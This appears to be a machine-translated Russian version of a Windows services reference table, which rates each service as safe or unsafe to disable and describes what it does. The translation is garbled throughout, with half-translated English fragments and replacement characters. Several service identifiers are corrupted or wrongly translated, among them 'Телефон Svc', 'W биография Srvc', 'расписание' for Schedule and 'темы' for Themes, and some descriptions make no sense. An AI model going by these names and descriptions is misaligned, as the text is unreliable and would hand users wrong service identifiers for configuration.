Общий доступ к Интернету Подключение ion (SharedAccess) Руководство �� ОК, чтобы отключить Предоставляет службы преобразования сетевых адресов, адресации, разрешения имен и предотвращения вторжения для домашней сети или сети небольшого офиса.
Вспомогательный IP-адрес (iphlpsvc) Автоматически �� ОК, чтобы отключить Обеспечивает возможность туннельного подключения с помощью технологий туннелирования для IPv6 (6to4, ISATAP, Port Proxy и Teredo) и IP-HTTPS. Если эта служба остановлена, компьютер не имеет расширенных преимуществ подключения, которые предлагают эти технологии.
Служба конфигурации IP-перевода (IpxlatCfgSvc) Руководство �� ОК, чтобы отключить Настраивает и включает перевод из версии 4 в версию 6 и наоборот.
Агент политики IPsec (PolicyAgent) Руководство ⛔ Не отключать Служба IPsec поддерживает одноранговую проверку подлинности на уровне сети, проверку подлинности источника данных, проверку целостности данных, их конфиденциальность (шифрование) и защиту от повторения. Эта служба применяет политики IPsec, созданные с помощью оснастки «Политики безопасности IP» или средства netsh ipsec командной строки. Перенастройка PolicyAgent вызывает проблемы с сетевым подключением, если политика требует использования IPsec, предотвращает удаленное управление брандмауэром Windows и не рекомендуется.
KtmRm для координатора распределенных транзакций (KtmRm) Руководство ⛔ Не отключать Координирует транзакции между координатором распределенных транзакций (MSDTC) и диспетчером транзакций ядра (KTM). Перенастройка службы KtmRm не рекомендуется. MsDTC и KTM автоматически запускают эту службу при необходимости. Если эта служба отключена, любая транзакция MSDTC, взаимодействующая с диспетчером ресурсов ядра, завершается ошибкой, и все службы, которые явно зависят от нее, не запускаются.
Служба языкового интерфейса (LxpSvc) Руководство ⛔ Не отключать Предоставляет поддержку инфраструктуры для развертывания и настройки локализованных ресурсов Windows. Перенастройка LxpSvc предотвращает развертывание языков Windows и не рекомендуется.
Mapper обнаружения топологии уровня ссылок (lltdsvc) Руководство �� ОК, чтобы отключить Создает карту сети, состоящую из сведений о топологии (подключении) ПК и устройств, а также метаданных, описывающих каждый ПК и устройство. Если эта служба отключена, карта сети не работает должным образом.
Служба поддержки локального профиля (wlpasvc) Автоматически �� ОК, чтобы отключить Эта служба предоставляет управление профилями для модулей удостоверений подписчика.
Локальный диспетчер сеансов (LSM) Автоматически ⛔ Не отключать Основная служба Windows, которая управляет сеансами локального пользователя. Перенастройка службы локального диспетчера сеансов приводит к нестабильности системы и не рекомендуется.
Сборщик Центра диагностики Microsoft (R) Standard ( диагностика hub.standardcollector.service) Руководство ⛔ Не отключать Служба сборщика центра диагностики уровня «Стандартный» собирает события etw в режиме реального времени и обрабатывает их. Перенастройка этой службы не рекомендуется.
Помощник по входу в учетную запись Майкрософт (wlidsvc) Руководство �� ОК, чтобы отключить Обеспечивает вход в систему на основе служб удостоверений учетных записей Майкрософт. Если эта служба остановлена, пользователи не смогут войти на компьютер с помощью учетной записи Майкрософт.
Клиент Microsoft App-V (AppVClient) Выключено ✅ Уже отключен Управляет пользователями и виртуальными приложениями App-V.
служба проверки сети антивирусная программа в Microsoft Defender (WdNisSvc) Руководство ⛔ Не отключать Помогает защититься от попыток вторжения, предназначенных для известных и вновь обнаруженных уязвимостей в сетевых протоколах.
Служба антивирусная программа в Microsoft Defender (WinDefend) Автоматически ⛔ Не отключать Помогает защитить пользователей от вредоносных программ и других потенциально нежелательных программ.
Служба повышения прав Microsoft Edge (MicrosoftEdgeElevationService) Автоматически �� Нет рекомендаций Поддерживает обновление Microsoft Edge. Отключение MicrosoftEdgeElevationService предотвращает обновления приложений.
Служба Центр обновления Microsoft Edge (edgeupdate) Автоматическое (отложенное начало) ⛔ Не отключать Сохраняет актуальность программного обеспечения Майкрософт. Если эта служба отключена или остановлена, программное обеспечение Майкрософт не обновляется. В результате уязвимости и проблемы безопасности не могут быть устранены. Эта служба удаляет себя при отсутствии программного обеспечения Майкрософт.
Служба Центр обновления Microsoft Edge (edgeupdatem) Руководство ⛔ Не отключать Сохраняет актуальность программного обеспечения Майкрософт. Если эта служба отключена или остановлена, программное обеспечение Майкрософт не обновляется. В результате уязвимости и проблемы безопасности не могут быть устранены. Эта служба удаляет себя при отсутствии программного обеспечения Майкрософт.
Служба инициатора Microsoft iSCSI (MSiSCSI) Руководство �� ОК, чтобы отключить Управление сеансами Internet SCSI (iSCSI) между компьютером и удаленными целевыми устройствами iSCSI. Если эта служба остановлена, этот компьютер не может войти в систему или получить доступ к целевым объектам iSCSI. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Фильтр клавиатуры Майкрософт (MsKeyboardFilter) Руководство �� Нет рекомендаций Управляет фильтрацией и сопоставлением клавиш.
Microsoft Passport (NgcSvc) Руководство �� ОК, чтобы отключить Обеспечивает изоляцию процесса для криптографических ключей, используемых для проверки подлинности в связанных поставщиках удостоверений пользователя. Если эта служба отключена, все использование этих ключей и управление ими недоступны, включая вход компьютера и единый вход для приложений и веб-сайтов. Эта служба запускается и останавливается автоматически. Перенастройка службы NgcSvc не рекомендуется.
Контейнер Microsoft Passport (NgcCtnrSvc) Руководство �� ОК, чтобы отключить Управляет ключами удостоверений локального пользователя, используемыми для проверки подлинности пользователей в поставщиках удостоверений и виртуальных смарт-карта доверенного платформенного модуля. Если эта служба отключена, ключи удостоверений локального пользователя и виртуальные смарт-карта TPM недоступны. Перенастройка ngcCtnrSvc не рекомендуется.
Поставщик теневого копирования программного обеспечения (swprv) Руководство �� ОК, чтобы отключить Управляет программным созданием теневых копий службой теневого копирования тома. Если эта служба остановлена, не удается управлять теневыми копиями томов на основе программного обеспечения. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Microsoft дисковые пространства SMP (smphost) Руководство �� ОК, чтобы отключить Хост-служба для поставщика управления дисковыми пространствами Майкрософт. Если эта служба остановлена или отключена, дисковые пространства нельзя управлять.
Служба установки Microsoft Store (InstallService) Руководство �� ОК, чтобы отключить
Служба маршрутизатора SMS Microsoft Windows (SmsRouter) Руководство �� ОК, чтобы отключить
Естественная проверка подлинности (NaturalAuthentication) Руководство �� ОК, чтобы отключить Служба агрегатора сигналов оценивает сигналы на основе времени, сети, геолокации, bluetooth и cdf-факторов. Поддерживаемые функции — это политики разблокировки устройств, динамической блокировки и MDM Для Динамо.
Служба общего доступа к портам Net.Tcp (NetTcpPortSharing) Выключено ✅ Уже отключен Предоставляет возможность совместного использования TCP-портов по протоколу net.tcp.
Netlogon (Netlogon ) Руководство �� ОК, чтобы отключить Эта служба обеспечивает безопасный канал между данным компьютером и контроллером домена, служащий для аутентификации пользователей и служб. Если эта служба остановлена, компьютер не проходит проверку подлинности пользователей и служб, а контроллер домена не может зарегистрировать записи DNS. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Автоматическая настройка сетевых Подключение устройств (NcdAutoSetup) Руководство �� ОК, чтобы отключить Службы автоматической настройки сетевых Подключение устройств и устанавливаются квалифицированные устройства, которые подключаются к квалифицированной сети. Остановка или отключение этой службы не позволяет Windows автоматически обнаруживать и устанавливать подключенные к сети устройства. Пользователи по-прежнему могут вручную добавлять подключенные к сети устройства на компьютер через пользовательский интерфейс.
Сетевой брокер Подключение ion (NcbService) Руководство �� ОК, чтобы отключить Выполняет функции посредника для подключений, благодаря чему приложения Microsoft Store могут получать уведомления из Интернета.
Сетевые Подключение ions (Netman) Руководство ⛔ Не отключать Управляет объектами папки »Сеть и удаленный доступ к сети», отображающей подключения к локальной сети и подключения удаленного доступа.
Помощник по Подключение производительности сети (NcaSvc) Руководство �� ОК, чтобы отключить Предоставляет уведомление о состоянии DirectAccess для компонентов пользовательского интерфейса.
Служба сетевых списков (netprofm) Руководство �� Нет рекомендаций Служба списка сетей собирает и сохраняет свойства для подключенных сетей и уведомляет приложения при изменении этих свойств.
Осведомленность о расположении сети (NlaSvc) Автоматически �� ОК, чтобы отключить Собирает и сохраняет сведения о конфигурации сети и уведомляет программы при изменении этих сведений. Если эта служба будет остановлена, сведения о конфигурации могут стать недоступными. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба настройки сети (NetSetupSvc) Руководство ⛔ Не отключать Служба настройки сети управляет установкой сетевых драйверов и разрешает конфигурацию низкоуровневых параметров сети. Остановка NetSetupSvc приводит к сбою установки драйверов во время выполнения и предотвращает настройку. Перенастройка NetSetupSvc не рекомендуется.
Служба интерфейса сетевого хранилища (nsi) Автоматически �� Нет рекомендаций Эта служба предоставляет сетевые уведомления (например, добавление и удаление интерфейса и т. д.) клиентам пользовательского режима. Остановка этой службы приводит к потере сетевого подключения. Если эта служба отключена, любые другие службы, которые явно зависят от этой службы, не запускаются.
Автономные файлы (CscService) Руководство �� ОК, чтобы отключить Служба автономных файлов выполняет действия по обслуживанию в кэше автономных файлов, реагирует на события входа пользователя и выхода, реализует внутренние элементы общедоступного API и отправляет события действий и изменения в состоянии кэша.
Агент проверки подлинности OpenSSH (ssh-agent) Выключено ✅ Уже отключен Агент для хранения закрытых ключей, используемых для проверки подлинности с открытым ключом.
Оптимизация дисков (defragsvc) Руководство �� ОК, чтобы отключить Помогает компьютеру работать более эффективно, оптимизируя файлы на дисках хранения.
Родительские элементы управления (WpcMonSvc) Руководство �� ОК, чтобы отключить Применяет родительские средства контроля для дочерних учетных записей в Windows. Если эта служба остановлена или отключена, родительские средства контроля не применяются.
диспетчер Платежи и NFC/SE (SEMgrSvc) Руководство �� ОК, чтобы отключить Управляет платежами и защищенными элементами на основе NFC (радиочастотная связь ближнего действия).
Протокол разрешения одноранговых имен (PNRPsvc) Руководство �� ОК, чтобы отключить
Группирование одноранговых сетей (p2psvc) Руководство �� ОК, чтобы отключить
Диспетчер удостоверений одноранговых сетей (p2pimsvc) Руководство �� ОК, чтобы отключить
Узел DLL счетчика производительности (PerfHost) Руководство ⛔ Не отключать Позволяет удаленным пользователям и 64-разрядным процессам запрашивать счетчики производительности, предоставляемые 32-разрядными библиотеками. Если эта служба остановлена, только локальные пользователи и 32-разрядные процессы могут запрашивать счетчики производительности, предоставляемые 32-разрядными библиотеками DLL.
Журналы производительности и оповещения (pla) Руководство ⛔ Не отключать Служба журналов и оповещений о производительности собирает данные с локальных и удаленных компьютеров соответственно заданным параметрам расписания, а затем записывает данные в журнал или выдает оповещение. Если эта служба остановлена, данные о производительности не собираются. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба Телефон (Телефон Svc) Руководство �� ОК, чтобы отключить Управляет состоянием телефонии на устройстве.
самонастраивающийся (PlugPlay) Руководство �� Нет рекомендаций Позволяет компьютеру распознавать изменения аппаратной части и адаптироваться к ним практически без участия пользователя. Остановка или отключение этой службы приводит к нестабильности системы.
Служба публикации имен компьютера PNRP (PNRPAutoReg) Руководство �� ОК, чтобы отключить
Служба перечисления переносимых устройств (WPDBusEnum) Руководство �� ОК, чтобы отключить Применяет групповую политику для съемных запоминающих устройств. Позволяет приложениям, таким как проигрыватель Windows Media и мастер импорта изображений, передавать и синхронизировать содержимое с помощью съемных запоминающих устройств.
Power (Power) Автоматически ⛔ Не отключать Управляет политикой электропитания и доставки уведомлений на основе этой политики.
Печать Spooler (Spooler ) Автоматически �� ОК, чтобы отключить Эта служба позволяет ставить задания печати в очередь и обеспечивает взаимодействие с принтером. Если вы отключите эту службу, вы не сможете печатать или просматривать принтеры.
Расширения принтера и уведомления (PrintNotify) Руководство �� ОК, чтобы отключить Эта служба открывает пользовательские диалоговые окна принтера и обрабатывает уведомления с удаленного сервера печати или принтера. Перенастройка PrintNotivy предотвращает использование расширений принтера и предотвращает уведомления.
Отчеты о проблемах и решениях панель управления поддержки (wercplsupport) Руководство �� Нет рекомендаций Эта служба обеспечивает поддержку просмотра, отправки и удаления отчетов о проблемах системного уровня для панели управления «Отчеты о проблемах и их решениях».
Служба помощника по совместимости программ (PcaSvc) Автоматически �� ОК, чтобы отключить Обеспечивает поддержку помощника по совместимости программ. Он следит за программами, устанавливаемыми и запускаемыми пользователем, и обнаруживает известные проблемы, связанные с совместимостью. Если эта служба остановлена, PCA не работает должным образом.
Качество видеотрансляции Windows (QWAVE) Руководство �� ОК, чтобы отключить Quality Windows Audio Video Experience (qWave) — сетевая платформа для приложений потоковой передачи аудио и видео в домашних сетях на основе IP-протокола. Платформа qWave обеспечивает более высокую производительность и надежность потоковой передачи аудио и видео, обеспечивая необходимое качество обслуживания сети для аудио- и видеоприложений. Платформа содержит механизмы управления доступом, отслеживания и принудительного выполнения, получения данных приложений и установки приоритета трафика.
Служба управления радио (RmSvc) Руководство �� ОК, чтобы отключить Служба «Управление радио» и «Режим самолета».
Рекомендуемая служба устранения неполадок (Устранение неполадокSvc) Руководство �� Нет рекомендаций Включает автоматическое устранение известных проблем, применяя рекомендуемые способы устранения неполадок. Отключение устранения неполадокSvc предотвращает устранение неполадок на устройстве.
Автоматическое диспетчер подключений удаленного доступа (RasAuto) Руководство �� ОК, чтобы отключить Создает соединение с удаленной сетью всякий раз, когда программа ссылается на имя или адрес удаленного DNS-сервера или NetBIOS.
Диспетчер подключений удаленного доступа (RasMan) Руководство �� ОК, чтобы отключить Управляет подключениями по телефону и виртуальной частной сетью** с этого компьютера к Интернету или другим удаленным сетям. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Конфигурация удаленного рабочего стола (SessionEnv) Руководство ⛔ Не отключать Служба конфигурации удаленных рабочих столов** (RDCS) отвечает за все службы удаленных рабочих столов и связанные с удаленным рабочим столом действия по настройке и обслуживанию сеанса, требующие контекста SYSTEM. Это касается временных папок сеансов, тем и сертификатов удаленных рабочих столов.
Службы удаленных рабочих столов (TermService) Руководство ⛔ Не отключать Разрешает пользователям интерактивно подключаться к удаленному компьютеру. Удаленный рабочий стол и сервер узла сеансов удаленных рабочих столов зависят от данной службы. Чтобы запретить удаленное использование этого компьютера, необходимо снять флажки на вкладке «Удаленный доступ» элемента «Свойства системы» панели управления.
Средство перенаправления портов userMode служб удаленных рабочих столов (UmRdpService) Руководство ⛔ Не отключать Разрешает перенаправление принтеров, дисков и портов для подключений RDP.
Удаленный вызов процедуры (RpcSs) Автоматически ⛔ Не отключать Служба RPCSS — это диспетчер управления службами для серверов COM и DCOM. Она выполняет запросы активации объектов, разрешение экспортера объектов и распределенный сбор мусора для этих серверов. Если эта служба остановлена или отключена, программы с помощью COM или DCOM не работают должным образом. Отключение службы RpcSs не рекомендуется.
Указатель вызова удаленной процедуры (RpcLocator ) Руководство �� ОК, чтобы отключить В Windows 2003 и более ранних версиях Windows служба локатора удаленного вызова процедур (RPC) управляет базой данных службы имен RPC. В Windows Vista и более поздних версиях Windows эта служба не предоставляет никаких функциональных возможностей и присутствует для совместимости приложений.
Удаленный реестр (RemoteRegistry) Автоматически ⛔ Не отключать Позволяет удаленным пользователям изменять параметры реестра на этом компьютере. Отключение службы RemoteRegistry ограничивает обновление реестра только локальным пользователям и не рекомендуется.
Розничная демонстрационная служба (RetailDemo) Автоматически �� ОК, чтобы отключить Служба «Демонстрация розничной торговли» управляет действием устройства, пока устройство находится в режиме розничной демонстрации.
Маршрутизация и удаленный доступ (RemoteAccess) Выключено ✅ Уже отключен Предоставляет службы маршрутизации для предприятий в локальной и глобальной сети.
Сопоставление конечных точек RPC (RpcEptMapper) Автоматически ⛔ Не отключать Разрешает идентификаторы интерфейсов RPC для транспортировки конечных точек. Если эта служба остановлена или отключена, программы с помощью служб удаленного вызова процедур (RPC) не работают должным образом.
Вторичный вход (seclogon) Руководство ⛔ Не отключать Позволяет запускать процессы от имени другого пользователя. Если эта служба остановлена, этот тип доступа к нам недоступен. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба протокола безопасного туннелирования сокетов (SstpSvc) Руководство �� ОК, чтобы отключить Обеспечивает поддержку протокола SSTP для подключения к удаленным компьютерам с использованием VPN. Если эта служба отключена, пользователи не смогут использовать SSTP для доступа к удаленным серверам.
Диспетчер учетных записей безопасности (SamSs) Автоматически ⛔ Не отключать Запуск этой службы сообщает другим службам, что диспетчер учетных записей безопасности (SAM) готов к приему запросов. Отключение этой службы предотвращает уведомление других служб в системе при готовности SAM, что приводит к сбою запуска этих служб. Эта служба не должна быть отключена.
Центр безопасности (wscsvc) Руководство ⛔ Не отключать Служба WSCSVC (Безопасность Windows Center) отслеживает и сообщает параметры работоспособности безопасности на компьютере. К параметрам работоспособности относятся брандмауэр (включено или выключение), антивирусная программа (вкл./выкл.), антишпиостер (вкл./выкл.), Обновл. Windows (автоматически или вручную скачивать и устанавливать обновления), контроль учетных записей пользователей (включено и выключение) и параметры Интернета (рекомендуется или не рекомендуется). Служба предоставляет API-интерфейсы COM для независимых поставщиков программного обеспечения для регистрации и записи состояния своих продуктов в службу Центра безопасности. Пользовательский интерфейс безопасности и обслуживания использует службу для предоставления оповещений systray и графического представления состояний работоспособности безопасности на панели управления «Безопасность и обслуживание». Защита доступа к сети (NAP) использует службу для отправки отчетов о работоспособности безопасности клиентов серверу политики сети NAP для принятия решений о карантине сети. Служба также имеет общедоступный API, который позволяет внешним потребителям программно получить агрегированное состояние работоспособности системы безопасности.
Служба данных датчика (SensorDataService) Руководство �� ОК, чтобы отключить Предоставляет данные из различных датчиков.
Служба мониторинга датчиков (SensrSvc) Руководство �� ОК, чтобы отключить Ведет наблюдение за различными датчиками для предоставления доступа к данным и адаптации к системному и пользовательскому состоянию. Перенастройка службы мониторинга датчиков предотвращает динамическое реагирование на изменения условий освещения. Остановка этой службы может также повлиять на другие системные функции и функции.
Служба датчиков (SensorService) Руководство �� ОК, чтобы отключить Служба, которая управляет функциями разных датчиков. Управляет простой ориентацией устройства (SDO) и журналом датчиков. Загружает простой датчик ориентации устройства, который передает сведения об изменениях в ориентации устройства. Если эта служба остановлена или отключена, датчик SDO не загружается и авторотация не возникает. Сбор журналов из датчиков останавливается.
Сервер (LanmanServer) Автоматически �� ОК, чтобы отключить Поддерживает совместное использование файлов, печати и именованных каналов по сети для этого компьютера. Если эта служба остановлена, эти функции недоступны. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Диспетчер учетных записей общего компьютера (shpamsvc) Автоматически �� ОК, чтобы отключить Управляет профилями и учетными записями на настроенном устройстве SharedPC.
Обнаружение оборудования оболочки (ShellHWDetection) Автоматически �� ОК, чтобы отключить Предоставляет уведомления о событиях оборудования auto-Play.
Смарт-карта (SCardSvr) Руководство �� ОК, чтобы отключить Управляет доступом к смарт-картам, считываемым этим компьютером. Если эта служба остановлена, этот компьютер не может считывать смарт-карта. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба перечисления устройств смарт-карт (ScDeviceEnum) Руководство �� ОК, чтобы отключить Создает узлы программного устройства для всех устройств чтения смарт-карт, доступных для этого сеанса. Если эта служба отключена, API WinRT не могут перечислять смарт-карта читателей. Требуется почти исключительно для приложений WinRT.
Политика удаления смарт-карт (SCPolicySvc) Руководство �� ОК, чтобы отключить Позволяет настроить систему для блокировки рабочего стола пользователя после удаления смарт-карты.
SNMP-ловушка (SNMPTRAP) Руководство �� ОК, чтобы отключить Принимает сообщения перехвата, созданные локальными или удаленными агентами SNMP и пересылает их программам управления SNMP, запущенным на этом компьютере. Если эта служба остановлена, программы на основе SNMP на этом компьютере не получают сообщений об ловушке SNMP. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Software Protection (sppsvc) Автоматически ⛔ Не отключать Позволяет скачивать, устанавливать и применять цифровые лицензии для Windows и приложений Windows. Если служба отключена, операционная система и лицензированные приложения выполняются в режиме уведомлений. Отключение защиты программного обеспечения не рекомендуется.
Служба пространственных данных (SharedRealitySvc) Руководство ⛔ Не отключать Эта служба используется для сценариев пространственного восприятия.
быстрая проверка (svsvc) Руководство ⛔ Не отключать Проверяет потенциальные повреждения файловой системы.
Обнаружение SSDP (SSDPSRV) Руководство �� ОК, чтобы отключить Обнаруживает сетевые устройства и службы, использующие протокол обнаружения SSDP, такие как устройства UPnP. Кроме того, объявляет устройства и службы SSDP, работающие на локальном компьютере. Если эта служба остановлена, устройства на основе SSDP не обнаруживаются. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба репозитория состояний (StateRepository) Руководство ⛔ Не отключать Обеспечивает необходимую поддержку инфраструктуры для модели приложения.
События получения изображений (WiaRpc) Руководство �� ОК, чтобы отключить Запускает приложения, связанные с событиями получения неподвижных изображений.
Служба служба хранилища (StorSvc) Автоматическое (отложенное начало) �� Нет рекомендаций Предоставляет службы для параметров хранилища и расширения внешнего хранилища.
Управление уровнями служба хранилища (TieringEngineService) Руководство �� Нет рекомендаций Оптимизирует размещение данных на уровнях хранилища во всех многоуровневых пространствах хранения в системе.
SysMain (SysMain) Автоматически ⛔ Не отключать Поддерживает и улучшает производительность системы с течением времени.
Служба уведомлений системных событий (SENS) Автоматически �� Нет рекомендаций Отслеживает системные события и уведомляет подписчиков системы событий COM+ об этих событиях.
Брокер системных событий (SystemEventsBroker) Автоматически ⛔ Не отключать Координирует выполнение фоновой работы для приложения WinRT. Если эта служба остановлена ​​или отключена, фоновые задачи могут не запускаться.
Брокер монитора среды выполнения System Guard (SgrmBroker) Автоматическое (отложенное начало) ⛔ Не отключать Отслеживает и проверяет целостность платформы Windows.
Планировщик задач (расписание) Автоматически ⛔ Не отключать Позволяет настраивать и задавать расписание автоматического выполнения задач на этом компьютере. Эта служба также отвечает за выполнение нескольких критически важных системных задач Windows. Если эта служба остановлена или отключена, эти задачи не выполняются в запланированное время. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Вспомогательный средство TCP/IP NetBIOS (lmhosts) Руководство �� ОК, чтобы отключить Служба вспомогательных служб NETBIOS TCP/IP обеспечивает поддержку службы NetBIOS по протоколу TCP/IP (NetBT) и разрешения имен NetBIOS для клиентов в сети, позволяя пользователям совместно использовать файлы, печать и вход в сеть. Если эта служба остановлена, эти функции недоступны. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Телефония (TapiSrv) Руководство �� ОК, чтобы отключить Предоставляет поддержку API телефонии (TAPI) для программ, управляющих устройствами телефонии. Отключение службы маршрутизации и удаленного доступа (RRAS).
Темы (темы ) Автоматически �� ОК, чтобы отключить Обеспечивает управление темой пользовательского интерфейса. Невозможно установить специализированные темы, когда эта служба отключена
Брокер времени (TimeBrokerSvc) Руководство ⛔ Не отключать Координирует выполнение фоновой работы для приложения WinRT. Если эта служба остановлена ​​или отключена, фоновые задачи могут не запускаться.
Сенсорный клавиатура и служба панели рукописного ввода (TabletInputService) Руководство �� ОК, чтобы отключить Включает функцию пера и рукописного ввода сенсорной клавиатуры и рукописного ввода.
Обновление службы Orchestrator для Обновл. Windows (UsoSvc) Руководство ⛔ Не отключать Управляет обновлениями Windows. Остановка службы UsoSvc предотвращает скачивание и установку последних обновлений. Обновл. Windows (вкл. WSUS) зависит от этой службы.
Узел устройства UPnP (upnphost) Руководство �� ОК, чтобы отключить Позволяет размещать устройства UPnP на этом компьютере. Если эта служба остановлена, все размещенные устройства UPnP перестают работать и не могут быть добавлены размещенные устройства. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба виртуализации пользовательского интерфейса (UevAgentService) Выключено ✅ Уже отключен Предоставляет поддержку перемещения параметров приложения и ОС.
User Manager (UserManager) Автоматически ⛔ Не отключать Диспетчер пользователей предоставляет компоненты среды выполнения, необходимые для взаимодействия с несколькими пользователями. Перенастройка службы UserManager может препятствовать правильной работе приложений и не рекомендуется.
Служба профилей пользователей (ProfSvc) Автоматически ⛔ Не отключать Эта служба отвечает за загрузку и выгрузку профилей пользователей. Отключение или остановка службы профилей пользователей предотвращает вход и выход пользователей, приложения могут столкнуться с проблемами с получением данных пользователей, а компоненты не получают уведомления о событиях профиля. Не рекомендуется перенастроить службу профилей пользователей.
Виртуальный диск (vds) Руководство �� Нет рекомендаций Предоставляет службы управления дисками, томами, файловыми системами и массивами хранения данных.
Теневая копия тома (VSS) Руководство �� ОК, чтобы отключить Управляет созданием теневых копий томов, которые используются для резервного копирования и восстановления или для иных целей. Если эта служба остановлена, теневые копии недоступны для резервного копирования, а резервное копирование может завершиться ошибкой. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба компостора volumetric Audio Compositor (VacSvc) Руководство �� ОК, чтобы отключить Размещает пространственный анализ для имитации звука Смешанная реальность.
WalletService (WalletService) Руководство �� ОК, чтобы отключить Размещает объекты, используемые клиентами кошелька.
WarpJITSvc (WarpJITSvc) Руководство �� ОК, чтобы отключить Включает поддержку компиляции JIT в d3d10warp.dll для процессов, в которых отключено создание кода.
Диспетчер веб-учетных записей (TokenBroker) Руководство �� ОК, чтобы отключить Эта служба используется диспетчером веб-учетных записей для предоставления единого входа в приложения и службы.
Веб-клиент (WebClient) Руководство �� ОК, чтобы отключить Позволяет программам на основе Windows создавать, получать доступ к интернет-файлам и изменять их. Если эта служба остановлена, эти функции недоступны. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Диспетчер подключений служб Wi-Fi (WFDSConMgrSvc) Руководство �� ОК, чтобы отключить Управляет подключениями к беспроводным службам, включая беспроводной дисплей и закрепление.
Звук Windows (Audiosrv) Руководство �� ОК, чтобы отключить Управляет аудио в программах на базе Windows. Если эта служба остановлена, звуковые устройства и эффекты не работают должным образом. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Построитель конечных точек Windows (AudioEndpointBuilder) Руководство �� ОК, чтобы отключить Управляет звуковыми устройствами для службы Windows Audio. Если эта служба остановлена, звуковые устройства и эффекты не работают должным образом. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
программа архивации данных (SDRSVC) Руководство �� ОК, чтобы отключить Предоставляет возможности программа архивации данных и восстановления.
Биометрические службы Windows (W биография Srvc) Руководство �� ОК, чтобы отключить Биометрическая служба Windows предназначена для сбора, сравнения, обработки и хранения биометрических данных в клиентских приложениях без получения непосредственного доступа к биометрическим образцам или оборудованию. Эта служба размещается в привилегированном процессе SVCHOST.
сервер кадров Камера Windows (FrameServer) Руководство �� ОК, чтобы отключить Позволяет нескольким клиентам получать доступ к видеокадрам с камер.
Windows Подключение now — регистратор конфигурации (Wcncsvc) Автоматически �� ОК, чтобы отключить WCNCSVC размещает конфигурацию Windows Подключение Now, которая является реализацией протокола беспроводной защищенной установки (WPS). Служба Wcncsvc используется для настройки параметров беспроводной локальной сети для точки доступа (AP) или беспроводного устройства. Служба запускается программным способом по мере необходимости.
Windows диспетчер подключений (Wcmsvc) Автоматически �� ОК, чтобы отключить Принимает решения об автоматическом подключении или отключении, исходя из доступных для ПК параметров подключения к сети, и позволяет управлять подключениями к сети на основе параметров групповой политики.
Расширенная служба защиты от угроз в Защитнике Windows (sense) Руководство ⛔ Не отключать Помогает защититься от попыток вторжения, предназначенных для известных и вновь обнаруженных уязвимостей в сетевых протоколах.
Брандмауэр Защитника Windows (mpssvc) Руководство ⛔ Не отключать Брандмауэр Windows помогает защитить компьютер, предотвращая попытки несанкционированных пользователей получить доступ к компьютеру через Интернет или из сети.
Служба узла поставщика шифрования Windows (WEPHOSTSVC) Руководство �� ОК, чтобы отключить Поставщики служб шифрования Windows выполняют шифрование связанных функций от поставщиков шифрования, отличных от Майкрософт, для процессов, которые должны оценивать и применять политики EAS. Остановка службы узлов поставщика шифрования Windows компрометирует проверка EAS, установленных подключенными учетными записями почты.
Служба отчеты об ошибках Windows (WerSvc) Руководство ⛔ Не отключать Разрешает отправку отчетов об ошибках в случае прекращения работы или реагирования программы на запросы, а также разрешает доставку имеющихся решений. Разрешает также создание журналов для служб диагностики и восстановления. Если эта служба остановлена, то могут не работать отчеты об ошибках и не отображаться результаты служб диагностики и восстановления. Собирает и отправляет данные о сбоях и зависаниях, используемых корпорацией Майкрософт и не microsoft ISVs/IHV. Данные используются для диагностики ошибок сбоя, которые могут включать ошибки безопасности. Также требуется для создания отчетов о корпоративных ошибках.
Сборщик событий Windows (Wecsvc) Руководство ⛔ Не отключать Служба сборщика событий Windows управляет постоянными подписками на события из удаленных источников, поддерживающих протокол WS-Management, включая журналы событий, аппаратные и источники событий с поддержкой IPMI. Эта служба хранит пересылаемые события в локальном журнале событий. Если эта служба остановлена или отключена, подписки на события и переадресация событий предотвращаются. Собирает события ETW (включая события безопасности) для управления, диагностика. Множество функций и средств, отличных от Майкрософт, полагаются на него, включая средства аудита безопасности.
Журнал событий Windows (EventLog) Автоматически ⛔ Не отключать Эта служба управляет событиями и журналами событий. Она поддерживает регистрацию и запрос событий, подписку на события, архивацию журналов и управление метаданными событий. События могут отображаться в формате XML и текстовом формате. Остановка этой службы может компрометации безопасности и надежности системы.
Служба кэша шрифтов Windows (FontCache) Автоматически ⛔ Не отключать Оптимизирует производительность приложений, кэшируя наиболее часто используемые данные о шрифтах. Приложения запускают эту службу, если она еще не запущена. Перенастройка службы кэша шрифтов Windows может снизить производительность приложения и не рекомендуется.
Приобретение образа Windows (stisvc) Руководство �� ОК, чтобы отключить Предоставляет службы приобретения изображений для сканеров и камер.
Служба предварительной оценки Windows (wisvc) Руководство �� ОК, чтобы отключить Предоставляет поддержку инфраструктуры программы предварительной оценки Windows. Эта служба должна оставаться включенной для работы программы предварительной оценки Windows.
Установщик Windows (msiserver) Руководство ⛔ Не отключать Добавляет, изменяет и удаляет приложения, предоставляемые в виде пакета установщика Windows (*.msi, *.msp). Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
Служба Windows License Manager (LicenseManager) Руководство �� ОК, чтобы отключить Обеспечивает поддержку инфраструктуры для Microsoft Store. Эта служба запускается по запросу. При отключении содержимое, полученное через Microsoft Store, не работает должным образом.
Инструментирование управления Windows (Winmgmt) Автоматически ⛔ Не отключать Предоставляет общий интерфейс и объектную модель для доступа к информации об управлении операционной системой, устройствами, приложениями и службами. Если эта служба остановлена, большинство программного обеспечения под управлением Windows не работает должным образом. Если эта служба отключена, все службы, которые явно зависят от нее, не запускаются.
